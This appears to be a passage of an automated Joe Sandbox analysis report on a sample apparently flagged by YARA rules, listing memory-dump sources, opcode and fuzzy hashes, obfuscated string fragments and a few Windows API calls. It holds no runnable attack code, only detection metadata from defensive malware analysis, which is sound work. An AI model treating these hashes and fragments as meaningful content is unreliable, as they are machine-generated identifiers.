                                                                                                                                                                                                                                                    • Opcode ID: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
                                                                                                                                                                                                                                                    • Instruction ID: 35d94b2223708410c1062df2d137d2b442f483653f699343e3a24a709425c5b9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF729E7160C7818FD724AF38C4953AFBBE2ABD5314F198D2DD5EA87392DA7984418B03
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: *B)$*B)$<=$O)O+$Q5Z7$T!M#$U1D3$V%G'$XY$\9X;$p-B/
                                                                                                                                                                                                                                                    • API String ID: 0-898000180
                                                                                                                                                                                                                                                    • Opcode ID: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
                                                                                                                                                                                                                                                    • Instruction ID: aed8a997269e7a3e60badd5fd3bd08e9d52830e9cad6e78054e7febab2e2e9f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52C10EB16483118BDB14CF18C89276BB7F2EFD6754F08896CE8D68B794E7348902C796
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                    • API String ID: 0-2246970021
                                                                                                                                                                                                                                                    • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                    • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                    • API String ID: 0-2246970021
                                                                                                                                                                                                                                                    • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                    • Instruction ID: 18d6fb89dc83d523d0fe05d23461a6b822a3de529e1eb2613cc735e81ebf982a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC3242B0601B469FDB48CF2AD580389BBB1FF45300F548698C9695FB5ADB35A892CFC0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                                    • API String ID: 0-119712241
                                                                                                                                                                                                                                                    • Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                    • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: !@$,$T$U$V$h
                                                                                                                                                                                                                                                    • API String ID: 0-1072848446
                                                                                                                                                                                                                                                    • Opcode ID: b818ee9c67694a0f4bc9b807532e0d54e79f31c8e805177f741268a403b11b31
                                                                                                                                                                                                                                                    • Instruction ID: 7f4f8c271271a0ee30063bf5d57d9afa0b4a7bb7edff0777766b2e5d54dfe869
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b818ee9c67694a0f4bc9b807532e0d54e79f31c8e805177f741268a403b11b31
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF22E17160C3A08FD320DF28D44436FBBE1ABD6314F598A2EE5D9873A1D77988458B4B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: !@$,$T$U$V$h
                                                                                                                                                                                                                                                    • API String ID: 0-1072848446
                                                                                                                                                                                                                                                    • Opcode ID: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
                                                                                                                                                                                                                                                    • Instruction ID: bc5f5021b0204d47ca18f0b390f9b81e490d9b50e153db0012c3ea9eb3d3fdcf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5228D7160C7908FD3649F28C45536FBBE1ABC6324F198E2DE5DA87392D6798844CB83
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                                    • API String ID: 0-2430453506
                                                                                                                                                                                                                                                    • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                    • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                    • API String ID: 0-3264166258
                                                                                                                                                                                                                                                    • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                    • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                    • API String ID: 0-3264166258
                                                                                                                                                                                                                                                    • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                    • Instruction ID: dc146d37665a4ea6584d30773a9c3469f18afc4521cb1c141f46a12cb4c06796
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1B1F8B010C3818BE364CF2984917BBFBD6AFD2314F188A6DD4D98B291DB798549C753
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00988A1B
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00988A25
                                                                                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00988AC2
                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00988AD7
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00988BD9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4063528623-0
                                                                                                                                                                                                                                                    • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                    • Instruction ID: f4c491f06fbbddc8eb6e2ed162cef1b8eb4a8b84c427a07f92d5ce6cf3d25fee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A417C77F4431807D71CBEB88C9A3AAB69A9BC4314F0A803E6985AB391DDB95C0553D1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                                    • API String ID: 0-1001561910
                                                                                                                                                                                                                                                    • Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                    • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                                    • API String ID: 0-3020956940
                                                                                                                                                                                                                                                    • Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                    • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                                    • API String ID: 0-3335612808
                                                                                                                                                                                                                                                    • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                    • Instruction ID: ba0418613ad0b10721630ac83fa728bdd6c319405e72302ace7d052fd09fcc8d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47D109B56083018BD724DF25C89276BB7F2EFD2314F18996CE4828B394F7799901C796
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                    • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                    • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                    • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                    • Instruction ID: 02334b45ac52255fd8d832680acbcd2b8c76bfc74d10911fba90e89d6127010b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6A108B110C3818FE368CF2984917BBBBD6AFD2314F288A6DD4D98B291DB758449C753
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                    • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                    • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                    • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                    • Instruction ID: d11da013b35ad3ceba21840f90bbc3bd5de53c669abf98031fdd8d9de2871f6c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A10A7010C3818FE364CF2984917BBBBD6AFD2314F288A6DD4D98B291DB758549C753
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                    • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                    • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                    • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                    • Instruction ID: b0687d28b6909f926e24e93b4ac9cbe9c07b60dfdf8e9af4308208c406c879bc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFA1F6B010C3818EE364CF2984917BBFBD6AFD2314F288A6DD4D98B291DB748449CB53
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                                    • API String ID: 0-979945983
                                                                                                                                                                                                                                                    • Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                    • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                    • API String ID: 0-3432275560
                                                                                                                                                                                                                                                    • Opcode ID: 1dc08f7f4a65f69d833c54d16e8845c12ed22c6975061a4595567d7b34b731c8
                                                                                                                                                                                                                                                    • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dc08f7f4a65f69d833c54d16e8845c12ed22c6975061a4595567d7b34b731c8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &-$)R_X$[O_[$zusR
